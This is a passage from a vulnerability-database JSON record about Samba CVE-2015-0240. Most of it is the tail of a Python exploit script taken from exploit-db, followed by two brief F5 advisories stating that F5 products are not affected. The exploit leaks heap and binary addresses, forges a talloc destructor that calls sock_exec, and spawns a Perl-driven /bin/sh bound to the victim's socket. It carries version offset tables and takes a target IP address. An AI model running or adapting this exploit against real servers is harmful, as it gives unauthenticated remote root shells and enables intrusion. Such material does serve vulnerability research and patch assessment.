leak, because r_out_addr is guessed\r\n answers = leak_info_addr(payload_addr, r_out_addr, chunk_addr + 0x18, False)\r\n if answers is None:\r\n return None\r\n if answers[2] != TALLOC_MAGIC:\r\n force_dce_disconnect()\r\n return None\r\n\r\n return answers[0]\r\n\r\ndef leak_info_find_offset(info):\r\n # offset from pool to payload still does not know\r\n print(\"[*] guessing 'r' offset and leaking 'uint8_t' address ...\")\r\n chunk_addr = info['chunk_addr']\r\n uint8t_addr = None\r\n r_addr = None\r\n r_out_addr = None\r\n while uint8t_addr is None:\r\n # 0x8c10 <= 4 + 0x7f88 + 0x2044 - 0x13c0\r\n # 0x9ce0 <= 4 + 0x7f88 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xadc8 <= 4 + 0x7f88 + 0x10e8 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xad40 is extra offset when no share on debian\r\n # 0x10d38 is extra offset when only [printers] is shared on debian\r\n for offset in (0x8c10, 0x9ce0, 0xadc8, 0xad40, 0x10d38):\r\n r_addr = chunk_addr - offset\r\n # 0x18 is out.authenticator offset\r\n r_out_addr = r_addr + 0x18\r\n print(\" [*] try 'r' offset 0x{:x}, r_out addr: 0x{:x}\".format(offset, r_out_addr))\r\n \r\n uint8t_addr = leak_uint8t_addr(info['payload_addr'], r_out_addr, chunk_addr)\r\n if uint8t_addr is not None:\r\n print(\" [*] success\")\r\n break\r\n print(\" [-] failed\")\r\n if uint8t_addr is None:\r\n return False\r\n \r\n info['uint8t_addr'] = uint8t_addr\r\n info['r_addr'] = r_addr\r\n info['r_out_addr'] = r_out_addr\r\n info['pool_addr'] = r_addr - 0x13c0\r\n \r\n print(\" [+] text 'uint8_t' addr: {:x}\".format(info['uint8t_addr']))\r\n print(\" [+] pool addr: {:x}\".format(info['pool_addr']))\r\n \r\n return True\r\n \r\ndef leak_sock_fd(info):\r\n # leak sock fd from\r\n # smb_request->sconn->sock\r\n # (offset: ->0x3c ->0x0 )\r\n print(\"[*] leaking socket fd ...\")\r\n info['smb_request_addr'] = info['pool_addr']+0x11a0\r\n print(\" [*] smb request addr: {:x}\".format(info['smb_request_addr']))\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr']+0x3c-4)\r\n if answers is None:\r\n print(' [-] cannot leak sconn_addr address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n sconn_addr = answers[2]\r\n info['sconn_addr'] = sconn_addr\r\n print(' [+] sconn addr: {:x}'.format(sconn_addr))\r\n \r\n # write in padding of chunk, no need to disconnect\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], sconn_addr)\r\n if answers is None:\r\n print('cannot leak sock_fd address :(')\r\n return None\r\n sock_fd = answers[1]\r\n print(' [+] sock fd: {:d}'.format(sock_fd))\r\n info['sock_fd'] = sock_fd\r\n return sock_fd\r\n\r\ndef leak_talloc_pop_addr(info):\r\n # leak destructor talloc_pop() address\r\n # overwrite name field, no need to disconnect\r\n print('[*] leaking talloc_pop address')\r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], info['pool_addr'] + 0x14)\r\n if answers is None:\r\n print(' [-] cannot leak talloc_pop() address :(')\r\n return None\r\n if answers[2] != 0x2010: # chunk size must be 0x2010\r\n print(' [-] cannot leak talloc_pop() address. answers[2] is wrong :(')\r\n return None\r\n talloc_pop_addr = answers[0]\r\n print(' [+] talloc_pop addr: {:x}'.format(talloc_pop_addr))\r\n info['talloc_pop_addr'] = talloc_pop_addr\r\n return talloc_pop_addr\r\n\r\ndef leak_smbd_server_connection_handler_addr(info):\r\n # leak address from\r\n # smbd_server_connection.smb1->fde ->handler\r\n # (offset: ->0x9c->0x14 )\r\n # MUST NOT disconnect after getting smb1_fd_event address\r\n print('[*] leaking smbd_server_connection_handler address')\r\n def real_leak_conn_handler_addr(info):\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['sconn_addr'] + 0x9c)\r\n if answers is None:\r\n print(' [-] cannot leak smb1_fd_event address :(')\r\n return None\r\n smb1_fd_event_addr = answers[1]\r\n print(' [*] smb1_fd_event addr: {:x}'.format(smb1_fd_event_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], smb1_fd_event_addr+0x14)\r\n if answers is None:\r\n print(' [-] cannot leak smbd_server_connection_handler address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n smbd_server_connection_handler_addr = answers[0]\r\n diff = info['talloc_pop_addr'] - smbd_server_connection_handler_addr\r\n if diff > 0x2000000 or diff < 0:\r\n print(' [-] get wrong smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n smbd_server_connection_handler_addr = None\r\n return smbd_server_connection_handler_addr\r\n \r\n smbd_server_connection_handler_addr = None\r\n while smbd_server_connection_handler_addr is None:\r\n smbd_server_connection_handler_addr = real_leak_conn_handler_addr(info)\r\n \r\n print(' [+] smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n info['smbd_server_connection_handler_addr'] = smbd_server_connection_handler_addr\r\n \r\n return smbd_server_connection_handler_addr\r\n\r\ndef find_smbd_base_addr(info):\r\n # estimate smbd_addr from talloc_pop\r\n if (info['talloc_pop_addr'] & 0xf) != 0 or (info['smbd_server_connection_handler_addr'] & 0xf) != 0:\r\n # code has no alignment\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x124000\r\n else:\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x130000\r\n start_addr = start_addr & 0xfffff000\r\n stop_addr = start_addr - 0x20000\r\n \r\n print('[*] finding smbd loaded addr ...')\r\n while True:\r\n smbd_addr = start_addr\r\n while smbd_addr >= stop_addr:\r\n if addr2utf_prefix(smbd_addr-8) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n test_addr = smbd_addr - 0x800 - 4\r\n else:\r\n test_addr = smbd_addr - 8\r\n # test writable on test_addr\r\n answers = leak_info_addr(info['payload_addr'], 0, test_addr, retry=False)\r\n if answers is not None:\r\n break\r\n smbd_addr -= 0x1000 # try prev page\r\n if smbd_addr > stop_addr:\r\n break\r\n print(' [-] failed. try again.')\r\n \r\n info['smbd_addr'] = smbd_addr\r\n print(' [+] found smbd loaded addr: {:x}'.format(smbd_addr))\r\n\r\ndef dump_mem_call_addr(info, target_addr):\r\n # leak pipes_struct address from\r\n # smbd_server_connection->chain_fsp->fake_file_handle->private_data\r\n # (offset: ->0x48 ->0xd4 ->0x4 )\r\n # Note:\r\n # - MUST NOT disconnect because chain_fsp,fake_file_handle,pipes_struct address will be changed\r\n # - target_addr will be replaced with current_pdu_sent address\r\n # check read_from_internal_pipe() in source3/rpc_server/srv_pipe_hnd.c\r\n print(' [*] overwrite current_pdu_sent for dumping memory ...')\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr'] + 0x48)\r\n if answers is None:\r\n print(' [-] cannot leak chain_fsp address :(')\r\n return False\r\n chain_fsp_addr = answers[1]\r\n print(' [*] chain_fsp addr: {:x}'.format(chain_fsp_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], chain_fsp_addr+0xd4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak fake_file_handle address :(')\r\n return False\r\n fake_file_handle_addr = answers[0]\r\n print(' [*] fake_file_handle addr: {:x}'.format(fake_file_handle_addr))\r\n\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], fake_file_handle_addr+0x4-0x4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak pipes_struct address :(')\r\n return False\r\n pipes_struct_addr = answers[2]\r\n print(' [*] pipes_struct addr: {:x}'.format(pipes_struct_addr))\r\n \r\n current_pdu_sent_addr = pipes_struct_addr+0x84\r\n print(' [*] current_pdu_sent addr: {:x}'.format(current_pdu_sent_addr))\r\n # change pipes->out_data.current_pdu_sent to dump memory\r\n return leak_info_unlink(info['payload_addr'], current_pdu_sent_addr-4, target_addr, call_only=True)\r\n\r\ndef dump_smbd_find_bininfo(info):\r\n def recv_till_string(data, s):\r\n pos = len(data)\r\n while True:\r\n data += force_recv()\r\n if len(data) == pos:\r\n print('no more data !!!')\r\n return None\r\n p = data.find(s, pos-len(s))\r\n if p != -1:\r\n return (data, p)\r\n pos = len(data)\r\n return None\r\n\r\n def lookup_dynsym(dynsym, name_offset):\r\n addr = 0\r\n i = 0\r\n offset_str = pack(\"<I\", name_offset)\r\n while i < len(dynsym):\r\n if dynsym[i:i+4] == offset_str:\r\n addr = unpack(\"<I\", dynsym[i+4:i+8])[0]\r\n break\r\n i += 16\r\n return addr\r\n \r\n print('[*] dumping smbd ...')\r\n dump_call = False\r\n # have to minus from smbd_addr because code section is read-only\r\n if addr2utf_prefix(info['smbd_addr']-4) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n dump_addr = info['smbd_addr'] - 0x800 - 4\r\n else:\r\n dump_addr = info['smbd_addr'] - 4\r\n for i in range(8):\r\n if dump_mem_call_addr(info, dump_addr):\r\n mem = force_recv()\r\n if len(mem) == 4280:\r\n dump_call = True\r\n break\r\n print(' [-] dump_mem_call_addr failed. try again')\r\n force_dce_disconnect()\r\n if not dump_call:\r\n print(' [-] dump smbd failed')\r\n return False\r\n \r\n print(' [+] dump success. getting smbd ...')\r\n # first time, remove any data before \\7fELF\r\n mem = mem[mem.index('\\x7fELF'):]\r\n\r\n mem, pos = recv_till_string(mem, '\\x00__gmon_start__\\x00')\r\n print(' [*] found __gmon_start__ at {:x}'.format(pos+1))\r\n \r\n pos = mem.rfind('\\x00\\x00', 0, pos-1)\r\n dynstr_offset = pos+1\r\n print(' [*] found .dynstr section at {:x}'.format(dynstr_offset))\r\n \r\n dynstr = mem[dynstr_offset:]\r\n mem = mem[:dynstr_offset]\r\n \r\n # find start of .dynsym section\r\n pos = len(mem) - 16\r\n while pos > 0:\r\n if mem[pos:pos+16] == '\\x00'*16:\r\n break\r\n pos -= 16 # sym entry size is 16 bytes\r\n if pos <= 0:\r\n print(' [-] found wrong .dynsym section at {:x}'.format(pos))\r\n return None\r\n dynsym_offset = pos\r\n print(' [*] found .dynsym section at {:x}'.format(dynsym_offset))\r\n dynsym = mem[dynsym_offset:]\r\n \r\n # find sock_exec\r\n dynstr, pos = recv_till_string(dynstr, '\\x00sock_exec\\x00')\r\n print(' [*] found sock_exec string at {:x}'.format(pos+1))\r\n sock_exec_offset = lookup_dynsym(dynsym, pos+1)\r\n print(' [*] sock_exec offset {:x}'.format(sock_exec_offset))\r\n \r\n #info['mem'] = mem # smbd data before .dynsym section\r\n info['dynsym'] = dynsym\r\n info['dynstr'] = dynstr # incomplete section\r\n info['sock_exec_addr'] = info['smbd_addr']+sock_exec_offset\r\n print(' [+] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n \r\n # Note: can continuing memory dump to find ROP\r\n \r\n force_dce_disconnect()\r\n \r\n########\r\n# code execution\r\n########\r\ndef call_sock_exec(info):\r\n prefix_len = addr2utf_prefix(info['sock_exec_addr'])\r\n if prefix_len == 3:\r\n return False # too bad... cannot call\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n fake_talloc_chunk_exec = pack(\"<IIIIIIIIIIII\",\r\n 0, 0, # next, prev\r\n 0, 0, # parent, child\r\n 0, # refs\r\n info['sock_exec_addr'], # destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n chunk = '\\x00'*prefix_len+fake_talloc_chunk_exec + info['cmd'] + '\\x00'\r\n set_payload(chunk, TARGET_PAYLOAD_SIZE)\r\n for i in range(3):\r\n if request_check_valid_addr(info['payload_addr']+TALLOC_HDR_SIZE+prefix_len):\r\n print('waiting for shell :)')\r\n return True\r\n print('something wrong :(')\r\n return False\r\n\r\n########\r\n# start work\r\n########\r\n\r\ndef check_exploitable():\r\n if request_check_valid_addr(0x41414141):\r\n print('[-] seems not vulnerable')\r\n return False\r\n if request_check_valid_addr(0):\r\n print('[+] seems exploitable :)')\r\n return True\r\n \r\n print(\"[-] seems vulnerable but I cannot exploit\")\r\n print(\"[-] I can exploit only if 'creds' is controlled by 'ReferentId'\")\r\n return False\r\n\r\ndef do_work(args):\r\n info = {}\r\n \r\n if not (args.payload_addr or args.heap_start or args.start_payload_size):\r\n if not check_exploitable():\r\n return\r\n\r\n start_size = 512*1024 # default size with 512KB\r\n if args.payload_addr:\r\n info['payload_addr'] = args.payload_addr\r\n else:\r\n heap_start = args.heap_start if args.heap_start else 0xb9800000+0x30000\r\n if args.start_payload_size:\r\n start_size = args.start_payload_size * 1024\r\n if start_size < TARGET_PAYLOAD_SIZE:\r\n start_size = 512*1024 # back to default\r\n info['payload_addr'] = find_payload_addr(heap_start, start_size, TARGET_PAYLOAD_SIZE)\r\n \r\n # the real talloc chunk address that stored the raw netlogon data\r\n # serverHandle 0x10 bytes. accountName 0xc bytes\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n\r\n while not leak_info_find_offset(info):\r\n # Note: do heap bruteforcing again seems to be more effective\r\n # start from payload_addr + some offset\r\n print(\"[+] bruteforcing heap again. start from {:x}\".format(info['payload_addr']+0x10000))\r\n info['payload_addr'] = find_payload_addr(info['payload_addr']+0x10000, start_size, TARGET_PAYLOAD_SIZE)\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n\r\n got_fd = leak_sock_fd(info)\r\n \r\n # create shell command for reuse sock fd\r\n cmd = \"perl -e 'use POSIX qw(dup2);$)=0;$>=0;\" # seteuid, setegid\r\n cmd += \"dup2({0:d},0);dup2({0:d},1);dup2({0:d},2);\".format(info['sock_fd']) # dup sock\r\n # have to kill grand-grand-parent process because sock_exec() does fork() then system()\r\n # the smbd process still receiving data from socket\r\n cmd += \"$z=getppid;$y=`ps -o ppid= $z`;$x=`ps -o ppid= $y`;kill 15,$x,$y,$z;\" # kill parents\r\n cmd += \"\"\"print \"shell ready\\n\";exec \"/bin/sh\";'\"\"\" # spawn shell\r\n info['cmd'] = cmd\r\n\r\n # Note: cannot use system@plt because binary is PIE and chunk dtor is called in libtalloc.\r\n # the ebx is not correct for resolving the system address\r\n smbd_info = {\r\n 0x5dd: { 'uint8t_offset': 0x711555, 'talloc_pop': 0x41a890, 'sock_exec': 0x0044a060, 'version': '3.6.3-2ubuntu2 - 3.6.3-2ubuntu2.3'},\r\n 0xb7d: { 'uint8t_offset': 0x711b7d, 'talloc_pop': 0x41ab80, 'sock_exec': 0x0044a380, 'version': '3.6.3-2ubuntu2.9'},\r\n 0xf7d: { 'uint8t_offset': 0x710f7d, 'talloc_pop': 0x419f80, 'sock_exec': 0x00449770, 'version': '3.6.3-2ubuntu2.11'},\r\n 0xf1d: { 'uint8t_offset': 0x71ff1d, 'talloc_pop': 0x429e80, 'sock_exec': 0x004614b0, 'version': '3.6.6-6+deb7u4'},\r\n }\r\n\r\n leak_talloc_pop_addr(info) # to double check the bininfo\r\n bininfo = smbd_info.get(info['uint8t_addr'] & 0xfff)\r\n if bininfo is not None:\r\n smbd_addr = info['uint8t_addr'] - bininfo['uint8t_offset']\r\n if smbd_addr + bininfo['talloc_pop'] == info['talloc_pop_addr']:\r\n # correct info\r\n print('[+] detect smbd version: {:s}'.format(bininfo['version']))\r\n info['smbd_addr'] = smbd_addr\r\n info['sock_exec_addr'] = smbd_addr + bininfo['sock_exec']\r\n print(' [*] smbd loaded addr: {:x}'.format(smbd_addr))\r\n print(' [*] use sock_exec offset: {:x}'.format(bininfo['sock_exec']))\r\n print(' [*] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n else:\r\n # wrong info\r\n bininfo = None\r\n \r\n got_shell = False\r\n if bininfo is None:\r\n # no target binary info. do a hard way to find them.\r\n \"\"\"\r\n leak smbd_server_connection_handler for 2 purposes\r\n - to check if compiler does code alignment\r\n - to estimate smbd loaded address\r\n - gcc always puts smbd_server_connection_handler() function at\r\n beginning area of .text section\r\n - so the difference of smbd_server_connection_handler() offset is\r\n very low for all smbd binary (compiled by gcc)\r\n \"\"\" \r\n leak_smbd_server_connection_handler_addr(info)\r\n find_smbd_base_addr(info)\r\n dump_smbd_find_bininfo(info)\r\n\r\n # code execution\r\n if 'sock_exec_addr' in info and call_sock_exec(info):\r\n s = get_socket()\r\n print(s.recv(4096)) # wait for 'shell ready' message\r\n s.send('uname -a\\n')\r\n print(s.recv(4096))\r\n s.send('id\\n')\r\n print(s.recv(4096))\r\n s.send('exit\\n')\r\n s.close()\r\n\r\n\r\ndef hex_int(x):\r\n return int(x,16)\r\n \r\n# command arguments\r\nparser = argparse.ArgumentParser(description='Samba CVE-2015-0240 exploit')\r\nparser.add_argument('target', help='target IP address')\r\nparser.add_argument('-hs', '--heap_start', type=hex_int,\r\n help='heap address in hex to start bruteforcing')\r\nparser.add_argument('-pa', '--payload_addr', type=hex_int, \r\n help='exact payload (accountName) address in heap. If this is defined, no heap bruteforcing')\r\nparser.add_argument('-sps', '--start_payload_size', type=int,\r\n help='start payload size for bruteforcing heap address in KB. (128, 256, 512, ...)')\r\n\r\nargs = parser.parse_args()\r\nrequester.set_target(args.target)\r\n\r\n\r\ntry:\r\n do_work(args)\r\nexcept KeyboardInterrupt:\r\n pass", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36741/"}], "f5": [{"lastseen": "2017-06-08T00:16:30", "bulletinFamily": "software", "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 11.0.0 - 11.6.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nLineRate| None| 2.2.0 - 2.5.0 \n1.6.0 - 1.6.4| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.1.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "modified": "2016-06-28T22:10:00", "published": "2015-04-02T21:02:00", "id": "F5:K16350", "href": "https://support.f5.com/csp/article/K16350", "title": "Samba vulnerability CVE-2015-0240", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:04", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "modified": "2016-06-28T00:00:00", "published": "2015-04-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/300/sol16350.html", "id": "SOL16350", "title": "SOL16350 - Samba vulnerability CVE-2015-0240", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}